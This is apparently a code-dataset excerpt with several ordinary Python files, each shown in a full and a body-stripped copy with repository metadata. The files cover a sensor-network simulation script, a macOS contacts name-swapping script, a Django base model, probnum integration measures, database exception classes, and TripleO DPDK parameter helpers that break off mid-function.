            (avroraOutputFile, traceFilePath) = AvroraLib.runSimulation(nescDir, runOutputDir, optQuery, int(optNetworkSize), simulationDuration = duration, networkFilePath = avroraNetFile)
            #Check query results
            schemaPath = os.getenv('SNEEQLROOT')+'/'+schemaFile
            checkTupleCount.checkResults(optQuery, traceFilePath, schemaPath, 10000, 1, duration)
            #Report total energy consumption
            siteLifetimeRankFile = "%s/site-lifetime-rank.csv" % nescDir
            (sumEnergy, maxEnergy, averageEnergy, radioEnergy, cpu_cycleEnergy, sensorEnergy, otherEnergy, networkLifetime) = AvroraLib.computeEnergyValues(runOutputDir, duration, inputFile = "avrora-out.txt", ignoreLedEnergy = True, siteLifetimeRankFile = siteLifetimeRankFile)
            report("The total energy consumption is %f" % (sumEnergy))
            report("The lifetime for this network is %f" % (networkLifetime)) #seems to be in seconds
            # Record whichever measured quantity matches the QoS goal.
            if optOptGoal=='min_energy':
                logToDataFile(overallOutputDir, nn, summary['min_f'], float(sumEnergy), summary['num DAFs considered'])
            else:
                logToDataFile(overallOutputDir, nn, summary['min_f'], float(networkLifetime), summary['num DAFs considered'])
def main():
    """Script entry point: parse arguments, start logging, build the
    query optimizer once, then run the nn sweep."""
    #parse the command-line arguments
    parseArgs(sys.argv[1:])
    timeStamp = UtilLib.getTimeStamp()
    startLogger(timeStamp)
    # Build the optimizer a single time; each sweep point only invokes it.
    SneeqlLib.compileQueryOptimizer()
    mainLoop()
if __name__ == "__main__":
    main()
| 7,161 | 0 | 269 |
54fa8cb4636d823aa634912d24017e8db3798df3 | 704 | py | Python | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | 4 | 2016-05-09T13:42:23.000Z | 2021-11-29T15:16:11.000Z | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | null | null | null | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import sys
from Foundation import *
from ScriptingBridge import *
ab = SBApplication.applicationWithBundleIdentifier_("com.apple.AddressBook")
# Walk every Address Book contact via the ScriptingBridge.  Where BOTH
# phonetic names are present, promote them to the real first/last name
# fields, clear the phonetic fields, and preserve the original name
# (surname-first concatenation) by prepending it to the contact's note.
# NOTE(review): Python 2 script; requires macOS with PyObjC installed.
for person in ab.people():
    fname = person.firstName()
    pfname = person.phoneticFirstName()
    lname = person.lastName()
    plname = person.phoneticLastName()
    note = person.note()
    print "%s %s %s %s %s" % (fname, pfname, lname, plname, note)
    if pfname and plname:
        # Original display name, surname first.
        cname = lname + fname
        if note:
            note = cname + "\n" + note
        else:
            note = cname
        person.setPhoneticLastName_("")
        person.setPhoneticFirstName_("")
        person.setFirstName_(pfname)
        person.setLastName_(plname)
        person.setNote_(note)
print "Done."
| 22.709677 | 76 | 0.697443 | #!/usr/bin/python
import sys
from Foundation import *
from ScriptingBridge import *
ab = SBApplication.applicationWithBundleIdentifier_("com.apple.AddressBook")
# Walk every Address Book contact via the ScriptingBridge.  Where BOTH
# phonetic names are present, promote them to the real first/last name
# fields, clear the phonetic fields, and preserve the original name
# (surname-first concatenation) by prepending it to the contact's note.
# NOTE(review): Python 2 script; requires macOS with PyObjC installed.
for person in ab.people():
    fname = person.firstName()
    pfname = person.phoneticFirstName()
    lname = person.lastName()
    plname = person.phoneticLastName()
    note = person.note()
    print "%s %s %s %s %s" % (fname, pfname, lname, plname, note)
    if pfname and plname:
        # Original display name, surname first.
        cname = lname + fname
        if note:
            note = cname + "\n" + note
        else:
            note = cname
        person.setPhoneticLastName_("")
        person.setPhoneticFirstName_("")
        person.setFirstName_(pfname)
        person.setLastName_(plname)
        person.setNote_(note)
print "Done."
| 0 | 0 | 0 |
aef7622db3edeec58c535a35d0af6b1e392615d4 | 450 | py | Python | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.text import ugettext_lazy as _
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
class BaseModel(models.Model):
    """
    An abstract base class model that provides self-updating `created` and
    `modified` fields.
    """
    # Timestamp fields come from django-model-utils.
    date_added = AutoCreatedField(_('date added'))
    date_updated = AutoLastModifiedField(_('date updated'))

    class Meta:
        # Bug fix: without this, Django creates a concrete table for
        # BaseModel, contradicting the docstring.  Abstract models only
        # contribute their fields to subclasses.
        abstract = True
| 26.470588 | 75 | 0.731111 | from django.db import models
from django.utils.text import ugettext_lazy as _
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
class BaseModel(models.Model):
    """
    An abstract base class model that provides self-updating `created` and
    `modified` fields.
    """
    # NOTE(review): `_` is imported above from django.utils.text, but
    # ugettext_lazy normally lives in django.utils.translation -- verify
    # this import actually resolves on the Django version in use.
    # NOTE(review): per django-model-utils convention, AutoCreatedField is
    # set once at creation and AutoLastModifiedField on every save --
    # confirm against the installed model_utils version.
    date_added = AutoCreatedField(_('date added'))
    date_updated = AutoLastModifiedField(_('date updated'))
    class Meta:
        # Abstract: no table is created for BaseModel itself.
        abstract = True
| 0 | 14 | 27 |
3d49ec04019e9889366c1843e35834272201e46f | 9,163 | py | Python | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 226 | 2019-11-01T09:44:09.000Z | 2022-03-30T23:17:17.000Z | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 590 | 2019-11-21T08:32:30.000Z | 2022-03-31T12:37:37.000Z | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 39 | 2020-01-13T16:29:45.000Z | 2022-03-28T16:16:54.000Z | """Contains integration measures."""
import abc
from typing import Optional, Tuple, Union
import numpy as np
import scipy.stats
from probnum.randvars import Normal
from probnum.typing import FloatArgType, IntArgType
class IntegrationMeasure(abc.ABC):
    """An abstract class for a measure against which a target function is integrated.
    Child classes implement specific integration measures and, if available, make use
    of random variables for sampling and evaluation of the density function.
    Parameters
    ----------
    dim :
        Dimension of the integration domain.
    domain :
        Tuple which contains two arrays which define the start and end points,
        respectively, of the rectangular integration domain.
    """
    # NOTE(review): this copy defines no __init__, so nothing here sets
    # ``self.random_variable`` (used by __call__/sample) or calls
    # ``_set_dimension_domain`` -- confirm an initializer was not removed.
    def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
        """Evaluate the density function of the integration measure.
        Parameters
        ----------
        points :
            *shape=(n_points,) or (n_points, dim)* -- Input locations.
        Returns
        -------
        density_evals :
            *shape=(n_points,)* -- Density evaluated at given locations.
        """
        # pylint: disable=no-member
        # ``random_variable`` is expected to be provided by the subclass.
        return self.random_variable.pdf(points).squeeze()
    def sample(
        self,
        rng: np.random.Generator,
        n_sample: IntArgType,
    ) -> np.ndarray:
        """Sample ``n_sample`` points from the integration measure.
        Parameters
        ----------
        rng :
            Random number generator
        n_sample :
            Number of points to be sampled
        Returns
        -------
        points :
            *shape=(n_sample,) or (n_sample,dim)* -- Sampled points
        """
        # pylint: disable=no-member
        # Always reshape to 2-D (n_sample, dim), even when dim == 1.
        return np.reshape(
            self.random_variable.sample(rng=rng, size=n_sample),
            newshape=(n_sample, self.dim),
        )
    def _set_dimension_domain(
        self,
        dim: IntArgType,
        domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
    ) -> None:
        """Sets the integration domain and dimension.
        The following logic is used to set the domain and dimension:
        1. If ``dim`` is not given (``dim == None``):
            1a. If either ``domain[0]`` or ``domain[1]`` is a scalar, the dimension
                is set as the maximum of their lengths and the scalar is expanded to
                a constant vector.
            1b. Otherwise, if the ``domain[0]`` and ``domain[1]`` are not of equal
                length, an error is raised.
        2. If ``dim`` is given:
            2a. If both ``domain[0]`` and ``domain[1]`` are scalars, they are
                expanded to constant vectors of length ``dim``.
            2b. If only one of `domain[0]`` and ``domain[1]`` is a scalar and the
                length of the other equals ``dim``, the scalar one is expanded to a
                constant vector of length ``dim``.
            2c. Otherwise, if neither of ``domain[0]`` and ``domain[1]`` is a
                scalar, error is raised if either of them has length which does not
                equal ``dim``.
        """
        # np.size treats Python scalars, 0-d arrays and length-1 arrays alike.
        domain_a_dim = np.size(domain[0])
        domain_b_dim = np.size(domain[1])
        # Check that given dimensions match and are positive
        dim_mismatch = False
        if dim is None:
            if domain_a_dim == domain_b_dim:
                dim = domain_a_dim
            elif domain_a_dim == 1 or domain_b_dim == 1:
                dim = np.max([domain_a_dim, domain_b_dim])
            else:
                dim_mismatch = True
        else:
            if (domain_a_dim > 1 or domain_b_dim > 1) and dim != np.max(
                [domain_a_dim, domain_b_dim]
            ):
                dim_mismatch = True
        if dim_mismatch:
            raise ValueError(
                "Domain limits must have the same length or at least "
                "one of them has to be one-dimensional."
            )
        if dim < 1:
            raise ValueError(f"Domain dimension dim = {dim} must be positive.")
        # Use same domain limit in all dimensions if only one limit is given
        if domain_a_dim == 1:
            domain_a = np.full((dim,), domain[0])
        else:
            domain_a = domain[0]
        if domain_b_dim == 1:
            domain_b = np.full((dim,), domain[1])
        else:
            domain_b = domain[1]
        # Check that the domain is non-empty
        if not np.all(domain_a < domain_b):
            raise ValueError("Domain must be non-empty.")
        self.dim = dim
        self.domain = (domain_a, domain_b)
class LebesgueMeasure(IntegrationMeasure):
    """Lebesgue measure on a hyper-rectangle.
    Parameters
    ----------
    dim :
        Dimension of the integration domain
    domain :
        Tuple which contains two arrays which define the start and end points,
        respectively, of the rectangular integration domain.
    normalized :
        Boolean which controls whether or not the measure is normalized (i.e.,
        integral over the domain is one).
    """
    # NOTE(review): the class body (``__init__``/``__call__``/``sample``)
    # is absent in this copy even though the docstring documents
    # constructor parameters -- confirm the implementation was not
    # accidentally removed.
# pylint: disable=too-few-public-methods
class GaussianMeasure(IntegrationMeasure):
    """Gaussian measure on Euclidean space with given mean and covariance.
    If ``mean`` and ``cov`` are scalars but ``dim`` is larger than one, ``mean`` and
    ``cov`` are extended to a constant vector and diagonal matrix, respectively,
    of appropriate dimensions.
    Parameters
    ----------
    mean :
        *shape=(dim,)* -- Mean of the Gaussian measure.
    cov :
        *shape=(dim, dim)* -- Covariance matrix of the Gaussian measure.
    dim :
        Dimension of the integration domain.
    """
    # NOTE(review): the class body (``__init__``) is absent in this copy
    # even though the docstring documents constructor parameters --
    # confirm the implementation was not accidentally removed.
| 34.708333 | 88 | 0.582451 | """Contains integration measures."""
import abc
from typing import Optional, Tuple, Union
import numpy as np
import scipy.stats
from probnum.randvars import Normal
from probnum.typing import FloatArgType, IntArgType
class IntegrationMeasure(abc.ABC):
    """An abstract class for a measure against which a target function is integrated.
    Child classes implement specific integration measures and, if available, make use
    of random variables for sampling and evaluation of the density function.
    Parameters
    ----------
    dim :
        Dimension of the integration domain.
    domain :
        Tuple which contains two arrays which define the start and end points,
        respectively, of the rectangular integration domain.
    """
    def __init__(
        self,
        dim: IntArgType,
        domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
    ) -> None:
        # Validates the arguments and sets self.dim / self.domain.
        # Subclasses are expected to additionally set self.random_variable.
        self._set_dimension_domain(dim, domain)
    def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
        """Evaluate the density function of the integration measure.
        Parameters
        ----------
        points :
            *shape=(n_points,) or (n_points, dim)* -- Input locations.
        Returns
        -------
        density_evals :
            *shape=(n_points,)* -- Density evaluated at given locations.
        """
        # pylint: disable=no-member
        # ``random_variable`` is provided by the concrete subclass.
        return self.random_variable.pdf(points).squeeze()
    def sample(
        self,
        rng: np.random.Generator,
        n_sample: IntArgType,
    ) -> np.ndarray:
        """Sample ``n_sample`` points from the integration measure.
        Parameters
        ----------
        rng :
            Random number generator
        n_sample :
            Number of points to be sampled
        Returns
        -------
        points :
            *shape=(n_sample,) or (n_sample,dim)* -- Sampled points
        """
        # pylint: disable=no-member
        # Always reshape to 2-D (n_sample, dim), even when dim == 1.
        return np.reshape(
            self.random_variable.sample(rng=rng, size=n_sample),
            newshape=(n_sample, self.dim),
        )
    def _set_dimension_domain(
        self,
        dim: IntArgType,
        domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
    ) -> None:
        """Sets the integration domain and dimension.
        The following logic is used to set the domain and dimension:
        1. If ``dim`` is not given (``dim == None``):
            1a. If either ``domain[0]`` or ``domain[1]`` is a scalar, the dimension
                is set as the maximum of their lengths and the scalar is expanded to
                a constant vector.
            1b. Otherwise, if the ``domain[0]`` and ``domain[1]`` are not of equal
                length, an error is raised.
        2. If ``dim`` is given:
            2a. If both ``domain[0]`` and ``domain[1]`` are scalars, they are
                expanded to constant vectors of length ``dim``.
            2b. If only one of `domain[0]`` and ``domain[1]`` is a scalar and the
                length of the other equals ``dim``, the scalar one is expanded to a
                constant vector of length ``dim``.
            2c. Otherwise, if neither of ``domain[0]`` and ``domain[1]`` is a
                scalar, error is raised if either of them has length which does not
                equal ``dim``.
        """
        # np.size treats Python scalars, 0-d arrays and length-1 arrays alike.
        domain_a_dim = np.size(domain[0])
        domain_b_dim = np.size(domain[1])
        # Check that given dimensions match and are positive
        dim_mismatch = False
        if dim is None:
            if domain_a_dim == domain_b_dim:
                dim = domain_a_dim
            elif domain_a_dim == 1 or domain_b_dim == 1:
                dim = np.max([domain_a_dim, domain_b_dim])
            else:
                dim_mismatch = True
        else:
            if (domain_a_dim > 1 or domain_b_dim > 1) and dim != np.max(
                [domain_a_dim, domain_b_dim]
            ):
                dim_mismatch = True
        if dim_mismatch:
            raise ValueError(
                "Domain limits must have the same length or at least "
                "one of them has to be one-dimensional."
            )
        if dim < 1:
            raise ValueError(f"Domain dimension dim = {dim} must be positive.")
        # Use same domain limit in all dimensions if only one limit is given
        if domain_a_dim == 1:
            domain_a = np.full((dim,), domain[0])
        else:
            domain_a = domain[0]
        if domain_b_dim == 1:
            domain_b = np.full((dim,), domain[1])
        else:
            domain_b = domain[1]
        # Check that the domain is non-empty
        if not np.all(domain_a < domain_b):
            raise ValueError("Domain must be non-empty.")
        self.dim = dim
        self.domain = (domain_a, domain_b)
class LebesgueMeasure(IntegrationMeasure):
    """Lebesgue measure restricted to a hyper-rectangle.
    The measure may optionally be normalized so that it integrates to one
    over the domain, in which case the density is 1 / volume(domain)
    everywhere inside the rectangle.
    Parameters
    ----------
    dim :
        Dimension of the integration domain
    domain :
        Tuple which contains two arrays which define the start and end points,
        respectively, of the rectangular integration domain.
    normalized :
        Boolean which controls whether or not the measure is normalized (i.e.,
        integral over the domain is one).
    """
    def __init__(
        self,
        domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
        dim: Optional[IntArgType] = None,
        normalized: Optional[bool] = False,
    ) -> None:
        super().__init__(dim=dim, domain=domain)
        self.normalized = normalized
        # A normalized measure scales densities by 1 / volume(domain).
        if normalized:
            volume = np.prod(self.domain[1] - self.domain[0])
            self.normalization_constant = 1.0 / volume
        else:
            self.normalization_constant = 1.0
        if self.normalization_constant in [0, np.Inf, -np.Inf]:
            raise ValueError(
                "Normalization constant is too small or too large. "
                "Consider setting normalized = False."
            )
        # scipy's uniform distribution stands in for a probnum uniform
        # random variable, which does not exist yet.
        widths = self.domain[1] - self.domain[0]
        self.random_variable = scipy.stats.uniform(loc=self.domain[0], scale=widths)
    def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
        # The density is constant; only the output shape depends on points.
        n_points = np.atleast_1d(points).shape[0]
        out_shape = () if n_points == 1 else (n_points,)
        return np.full(out_shape, self.normalization_constant)
    def sample(
        self,
        rng: np.random.Generator,
        n_sample: IntArgType,
    ) -> np.ndarray:
        # Draw directly as a (n_sample, dim) array from the scipy frozen rv.
        sample_shape = (n_sample, self.dim)
        return self.random_variable.rvs(size=sample_shape, random_state=rng)
# pylint: disable=too-few-public-methods
class GaussianMeasure(IntegrationMeasure):
    """Gaussian measure on Euclidean space with given mean and covariance.
    If ``mean`` and ``cov`` are scalars but ``dim`` is larger than one, ``mean`` and
    ``cov`` are extended to a constant vector and diagonal matrix, respectively,
    of appropriate dimensions.
    Parameters
    ----------
    mean :
        *shape=(dim,)* -- Mean of the Gaussian measure.
    cov :
        *shape=(dim, dim)* -- Covariance matrix of the Gaussian measure.
    dim :
        Dimension of the integration domain.
    """
    def __init__(
        self,
        mean: Union[float, np.floating, np.ndarray],
        cov: Union[float, np.floating, np.ndarray],
        dim: Optional[IntArgType] = None,
    ) -> None:
        # Extend scalar mean and covariance to higher dimensions if dim has been
        # supplied by the user
        # pylint: disable=fixme
        # TODO: This needs to be modified to account for cases where only either the
        # mean or covariance is given in scalar form
        if (
            (np.isscalar(mean) or mean.size == 1)
            and (np.isscalar(cov) or cov.size == 1)
            and dim is not None
        ):
            mean = np.full((dim,), mean)
            cov = cov * np.eye(dim)
        # Set dimension based on the mean vector
        # (any user-supplied dim is overridden here once expansion is done).
        if np.isscalar(mean):
            dim = 1
        else:
            dim = mean.size
        # If cov has been given as a vector of variances, transform to diagonal matrix
        if isinstance(cov, np.ndarray) and np.squeeze(cov).ndim == 1 and dim > 1:
            cov = np.diag(np.squeeze(cov))
        # Exploit random variables to carry out mean and covariance checks
        self.random_variable = Normal(mean=np.squeeze(mean), cov=np.squeeze(cov))
        self.mean = self.random_variable.mean
        self.cov = self.random_variable.cov
        # Set diagonal_covariance flag
        # (True when every off-diagonal entry of cov is exactly zero).
        if dim == 1:
            self.diagonal_covariance = True
        else:
            self.diagonal_covariance = (
                np.count_nonzero(self.cov - np.diag(np.diagonal(self.cov))) == 0
            )
        # The Gaussian measure lives on all of R^dim.
        super().__init__(
            dim=dim,
            domain=(np.full((dim,), -np.Inf), np.full((dim,), np.Inf)),
        )
| 3,214 | 0 | 135 |
a41dca34310966caf3e8427d639781fcb0598d18 | 761 | py | Python | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | 2 | 2021-01-16T21:45:57.000Z | 2021-01-24T06:31:16.000Z | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | null | null | null | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
Exceptions
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
# Exceptions for DATABASE
class DBSQLiteConnectionError(Exception):
    """An error occurred in the SQLite database connection"""
class DBSQLiteError(Exception):
    """An error occurred in the SQLite database operations"""
class DBMySQLConnectionError(Exception):
    """An error occurred in the MySQL database connection"""
class DBMySQLError(Exception):
    """An error occurred in the MySQL database operations"""
class DBProfilesMissing(Exception):
    """There are no stored profiles in the database"""
class DBRecordNotExistError(Exception):
    """The record does not exist in the database"""
| 22.382353 | 56 | 0.720105 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
Exceptions
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
# Exceptions for DATABASE
class DBSQLiteConnectionError(Exception):
    """An error occurred in the SQLite database connection"""
class DBSQLiteError(Exception):
    """An error occurred in the SQLite database operations"""
class DBMySQLConnectionError(Exception):
    """An error occurred in the MySQL database connection"""
class DBMySQLError(Exception):
    """An error occurred in the MySQL database operations"""
class DBProfilesMissing(Exception):
    """There are no stored profiles in the database"""
class DBRecordNotExistError(Exception):
    """The record does not exist in the database"""
| 0 | 0 | 0 |
b8830ac7964ef91a4f94e8863c8ef461e382bb37 | 18,342 | py | Python | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import re
from mistral_lib import actions
from tripleo_common.actions import base
from tripleo_common import exception
LOG = logging.getLogger(__name__)
class GetDpdkNicsNumaInfoAction(base.TripleOAction):
    """Gets the DPDK NICs with MTU for NUMA nodes.
    Find the DPDK interface names from the network config and
    translate it to physical interface names using the introspection
    data. And then find the NUMA node associated with the DPDK
    interface and the MTU value.
    :param network_configs: network config list
    :param inspect_data: introspection data
    :param mtu_default: mtu default value for NICs
    :return: DPDK NICs NUMA nodes info
    """
    # NOTE(review): only the comments of the method bodies remain in this
    # copy -- the implementations themselves appear to have been stripped.
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    # Gets numa node id for physical NIC name
    # Get physical interface name for NIC name
    # Gets dpdk interfaces and mtu info for dpdk config
    # Default mtu(recommended 1500) is used if no MTU is set for DPDK NIC
class GetDpdkCoreListAction(base.TripleOAction):
    """Gets the DPDK PMD Core List.
    With input as the number of physical cores for each NUMA node,
    find the right logical CPUs to be allocated along with its
    siblings for the PMD core list.
    :param inspect_data: introspection data
    :param numa_nodes_cores_count: physical cores count for each NUMA
    :return: DPDK Core List
    """
    # NOTE(review): the class body is absent in this copy even though the
    # docstring documents parameters -- confirm the implementation was not
    # accidentally removed.
class GetHostCpusListAction(base.TripleOAction):
    """Gets the Host CPUs List.
    CPU threads from first physical core is allocated for host processes
    on each NUMA nodes.
    :param inspect_data: introspection data
    :return: Host CPUs List
    """
    # NOTE(review): the class body is absent in this copy even though the
    # docstring documents parameters -- confirm the implementation was not
    # accidentally removed.
class GetDpdkSocketMemoryAction(base.TripleOAction):
    """Gets the DPDK Socket Memory List.
    For NUMA node with DPDK nic, socket memory is calculated
    based on MTU, Overhead and Packet size in buffer.
    For NUMA node without DPDK nic, minimum socket memory is
    assigned (recommended 1GB)
    :param dpdk_nics_numa_info: DPDK nics numa info
    :param numa_nodes: list of numa nodes
    :param overhead: overhead value
    :param packet_size_in_buffer: packet size in buffer
    :param minimum_socket_memory: minimum socket memory
    :return: DPDK Socket Memory List
    """
    # NOTE(review): only the comments of the method bodies remain in this
    # copy -- the implementations themselves appear to have been stripped.
    # Computes round off MTU value in bytes
    # example: MTU value 9000 into 9216 bytes
    # Calculates socket memory for a NUMA node
class ConvertNumberToRangeListAction(base.TripleOAction):
    """Converts number list into range list
    :param num_list: comma delimited number list as string
    :return: comma delimited range list as string
    """
    # NOTE(review): only the comments of the method bodies remain in this
    # copy -- the implementations themselves appear to have been stripped.
    # converts number list into range list.
    # here input parameter and return value as list
    # example: [12, 13, 14, 17] into ["12-14", "17"]
class ConvertRangeToNumberListAction(base.TripleOAction):
    """Converts range list to integer list
    :param range_list: comma delimited range list as string / list
    :return: comma delimited number list as string
    """
    # NOTE(review): only the comments of the method bodies remain in this
    # copy -- the implementations themselves appear to have been stripped.
    # converts range list into number list
    # here input parameter and return value as list
    # example: ["12-14", "^13", "17"] into [12, 14, 17]
| 39.360515 | 79 | 0.602061 | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import re
from mistral_lib import actions
from tripleo_common.actions import base
from tripleo_common import exception
LOG = logging.getLogger(__name__)
class GetDpdkNicsNumaInfoAction(base.TripleOAction):
    """Gets the DPDK NICs with MTU for NUMA nodes.
    Find the DPDK interface names from the network config and
    translate it to physical interface names using the introspection
    data. And then find the NUMA node associated with the DPDK
    interface and the MTU value.
    :param network_configs: network config list
    :param inspect_data: introspection data
    :param mtu_default: mtu default value for NICs
    :return: DPDK NICs NUMA nodes info
    """
    def __init__(self, network_configs, inspect_data, mtu_default=1500):
        super(GetDpdkNicsNumaInfoAction, self).__init__()
        self.network_configs = network_configs
        self.inspect_data = inspect_data
        self.mtu_default = mtu_default
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    def _natural_sort_key(self, s):
        """Sort key splitting digit runs so 'nic10' sorts after 'nic2'."""
        nsre = re.compile('([0-9]+)')
        return [int(text) if text.isdigit() else text
                for text in re.split(nsre, s)]
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    def _is_embedded_nic(self, nic):
        """Return True for on-board NIC names (em*, eth*, eno*)."""
        if (nic.startswith('em') or nic.startswith('eth') or
                nic.startswith('eno')):
            return True
        return False
    # TODO(jpalanis): Expose this utility from os-net-config to sort
    # active nics
    def _ordered_nics(self, interfaces):
        """Order interfaces as os-net-config does: embedded NICs first,
        each group naturally sorted, so 'nicN' aliases resolve correctly."""
        embedded_nics = []
        nics = []
        for iface in interfaces:
            nic = iface.get('name', '')
            if self._is_embedded_nic(nic):
                embedded_nics.append(nic)
            else:
                nics.append(nic)
        active_nics = (sorted(
            embedded_nics, key=self._natural_sort_key) +
            sorted(nics, key=self._natural_sort_key))
        return active_nics
    # Gets numa node id for physical NIC name
    def find_numa_node_id(self, numa_nics, nic_name):
        """Return the NUMA node id for ``nic_name``, or None if unknown."""
        for nic_info in numa_nics:
            if nic_info.get('name', '') == nic_name:
                return nic_info.get('numa_node', None)
        return None
    # Get physical interface name for NIC name
    def get_physical_iface_name(self, ordered_nics, nic_name):
        """Translate a 'nicN' alias (1-based) into the N-th active
        interface name; other names are returned unchanged."""
        if nic_name.startswith('nic'):
            # Nic numbering, find the actual interface name
            nic_number = int(nic_name.replace('nic', ''))
            if nic_number > 0:
                iface_name = ordered_nics[nic_number - 1]
                return iface_name
        return nic_name
    # Gets dpdk interfaces and mtu info for dpdk config
    # Default mtu(recommended 1500) is used if no MTU is set for DPDK NIC
    def get_dpdk_interfaces(self, dpdk_objs):
        """Collect member interfaces of DPDK ports/bonds plus the MTU.

        Note: a single MTU is returned; when several objects carry
        different MTUs the last one seen wins (pre-existing behavior).
        """
        mtu = self.mtu_default
        dpdk_ifaces = []
        for dpdk_obj in dpdk_objs:
            obj_type = dpdk_obj.get('type')
            mtu = dpdk_obj.get('mtu', self.mtu_default)
            if obj_type == 'ovs_dpdk_port':
                # Member interfaces of ovs_dpdk_port
                dpdk_ifaces.extend(dpdk_obj.get('members', []))
            elif obj_type == 'ovs_dpdk_bond':
                # ovs_dpdk_bond will have multiple ovs_dpdk_ports
                for bond_member in dpdk_obj.get('members', []):
                    if bond_member.get('type') == 'ovs_dpdk_port':
                        dpdk_ifaces.extend(bond_member.get('members', []))
        return (dpdk_ifaces, mtu)
    def run(self, context):
        """Return a list of {name, numa_node, mtu, bridge_name, addresses}
        dicts for every DPDK NIC, or an error Result when the
        introspection data is insufficient."""
        interfaces = self.inspect_data.get('inventory',
                                           {}).get('interfaces', [])
        # Checks whether inventory interfaces information is not available
        # in introspection data.
        if not interfaces:
            msg = 'Introspection data does not have inventory.interfaces'
            return actions.Result(error=msg)
        numa_nics = self.inspect_data.get('numa_topology',
                                          {}).get('nics', [])
        # Checks whether numa topology nics information is not available
        # in introspection data.
        if not numa_nics:
            msg = 'Introspection data does not have numa_topology.nics'
            return actions.Result(error=msg)
        active_interfaces = [iface for iface in interfaces
                             if iface.get('has_carrier', False)]
        # Checks whether active interfaces are not available
        if not active_interfaces:
            msg = 'Unable to determine active interfaces (has_carrier)'
            return actions.Result(error=msg)
        dpdk_nics_numa_info = []
        ordered_nics = self._ordered_nics(active_interfaces)
        # Gets DPDK network config and parses to get DPDK NICs
        # with mtu and numa node id
        for config in self.network_configs:
            if config.get('type', '') == 'ovs_user_bridge':
                bridge_name = config.get('name', '')
                addresses = config.get('addresses', [])
                members = config.get('members', [])
                dpdk_ifaces, mtu = self.get_dpdk_interfaces(members)
                for dpdk_iface in dpdk_ifaces:
                    # Renamed from ``type`` to avoid shadowing the builtin.
                    member_type = dpdk_iface.get('type', '')
                    if member_type == 'sriov_vf':
                        name = dpdk_iface.get('device', '')
                    else:
                        name = dpdk_iface.get('name', '')
                    phy_name = self.get_physical_iface_name(
                        ordered_nics, name)
                    node = self.find_numa_node_id(numa_nics, phy_name)
                    if node is None:
                        msg = ('Unable to determine NUMA node for '
